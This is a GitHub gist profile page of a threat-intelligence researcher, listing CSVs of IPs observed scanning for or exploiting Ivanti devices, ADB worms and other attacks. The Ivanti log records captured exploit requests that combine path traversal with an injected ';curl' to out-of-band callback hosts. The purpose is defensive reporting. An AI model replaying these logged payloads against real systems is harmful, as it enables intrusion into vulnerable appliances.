Skip to content

Instantly share code, notes, and snippets.

View andrew-morris's full-sized avatar
💭
¯\_(ツ)_/¯

Andrew Morris andrew-morris

💭
¯\_(ツ)_/¯
View GitHub Profile

Keybase proof

I hereby claim:

  • I am andrew---morris on github.
  • I am morris (https://keybase.io/morris) on keybase.
  • I have a public key whose fingerprint is 1F50 1325 8595 EC49 9A71 8AD1 C0B9 E4CA 97CE 2C60

To claim this, I am signing this object:

@andrew-morris
andrew-morris / ivanti.csv
Last active February 8, 2024 09:55
IPs that are scanning for, or exploiting, vulnerable Ivanti devices (a la GreyNoise) - Updated Feb 01 2024
We can make this file beautiful and searchable if this error is corrected: Unclosed quoted field in line 5.
Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../
curl -s https://gist.githubusercontent.com/gnremy/c546c7911d5f876f263309d7161a7217/raw/170f7d6cf92172443ecc68db0b6cbd4d8226a398/CVE-2021-44228_IPs.csv | cut -d, -f1 | while read ip;do curl -XGET -s https://api.greynoise.io/v3/community/$ip;done | jq -s
@andrew-morris
andrew-morris / 7aac1a57-4f05-48db-8d55-950674d3eefc.csv
Created October 13, 2021 14:13
IPs scanning or attacking hosts in exclusively Isreal
ip classification first_seen last_seen
20.86.27.229 unknown 2021-10-07 2021-10-13
196.196.216.5 unknown 2021-10-13 2021-10-13
194.147.158.42 malicious 2021-07-26 2021-10-13
20.50.139.51 unknown 2021-05-27 2021-10-13
103.229.41.5 unknown 2021-10-09 2021-10-12
91.211.52.221 malicious 2018-05-19 2021-10-12
116.110.156.140 malicious 2021-10-12 2021-10-12
2.61.251.177 unknown 2021-10-08 2021-10-12
194.147.158.42 malicious 2021-07-26 2021-10-12
@andrew-morris
andrew-morris / big_dns_requests.md
Created July 15, 2020 18:59
big dns requests

I'm doing a bit of cursory research into GreyNoise data WRT CVE-2020-1350.

The following IPs have blasted the Internet with large DNS requests (>1000 bytes) in the past 24 hours:

(sorted by packet count)

  16 89.196.51.73
  13 5.209.199.204
  12 62.102.143.106
  10 188.212.245.149
@andrew-morris
andrew-morris / adb_worms.csv
Created July 11, 2018 19:23
Source: GreyNoise Intelligence
We can make this file beautiful and searchable if this error is corrected: It looks like row 9 should actually have 15 columns, instead of 1. in line 8.
ip,tag_name,category,confidence,org,rdns,rdns_parent,datacenter,asn,country,type,os,tor,created,updated
5.152.142.44,ADB Worm,worm,high,alternatYva S.r.l.,,,,AS199026,IT,business,,false,2018-07-11 16:34:40,2018-07-11 16:34:40
172.56.41.28,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 14:43:46,2018-07-11 14:43:46
182.113.100.116,ADB Worm,worm,high,China Unicom Henan province network,hn.kd.ny.adsl,ny.adsl,,AS4837,CN,isp,,false,2018-07-11 14:25:43,2018-07-11 14:25:43
172.56.21.52,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 14:02:23,2018-07-11 14:02:23
172.58.201.119,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 13:23:11,2018-07-11 13:23:11
172.58.232.84,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 13:00:38,2018-07-11 13:00:38
222.140.131.222,ADB Worm,worm,high,China Unicom Henan province network,hn.kd.ny.adsl,ny.adsl,,AS4837,CN,isp,,false,2018-07-11 12:51:00,2018-07-11 12:51:00
172.58.175.63
@andrew-morris
andrew-morris / jacked.txt
Last active July 5, 2018 23:31
Quick research to find the most (relatively) unsafe ASNs using GreyNoise Intelligence
RATIO ASN POPPED SIZE ORG
0.3945 AS52635 404 1024 SPEEDCONNECT - TECNOLOGIA E EQUIPAMENTOS
0.2500 AS60490 1 4 MTS PJSC
0.2500 AS198517 1 4 DOLNET GROUP sp. z o.o.
0.2158 AS263256 442 2048 PROVEDOR DE INTERNET EXTREMA LTDA - ME
0.2080 AS264643 213 1024 Enredes S.A.
0.1941 AS133469 795 4096 Multinet (Udaipur) Private Limited
0.1592 AS263051 326 2048 Infopardall Ltda me
0.1426 AS133692 146 1024 Fastnet Communication Pvt. Ltd.
0.1406 AS135195 36 256 NS COMPUTERS
2018-05-11 187.136.89.107 Uninet S.A. de C.V.
2018-05-11 187.144.147.60 Uninet S.A. de C.V.
2018-05-11 187.144.221.151 Uninet S.A. de C.V.
2018-05-09 187.214.10.43 Uninet S.A. de C.V.
2018-05-11 189.130.179.145 Gestión de direccionamiento UniNet
2018-05-11 189.152.107.245 Gestión de direccionamiento UniNet
2018-05-11 189.163.122.185 Gestión de direccionamiento UniNet
2018-05-11 189.163.143.187 Gestión de direccionamiento UniNet
2018-05-11 189.163.242.157 Gestión de direccionamiento UniNet
2018-05-11 189.175.244.203 Gestión de direccionamiento UniNet
118.116.127.196|2018-03-22
62.28.56.161|2018-03-22
185.109.161.38|2018-03-22
185.109.161.38|2018-03-21
62.28.56.161|2018-03-21
5.188.11.89|2018-03-21
77.72.82.22|2018-03-21
91.217.9.163|2018-03-20
5.188.11.89|2018-03-20
5.188.11.89|2018-03-19

Keybase proof

I hereby claim:

  • I am andrew-morris on github.
  • I am morris (https://keybase.io/morris) on keybase.
  • I have a public key ASBlpwslKu2sXbUuQprFS7K1c0TheWE4rgh79uiwuUYNlQo

To claim this, I am signing this object: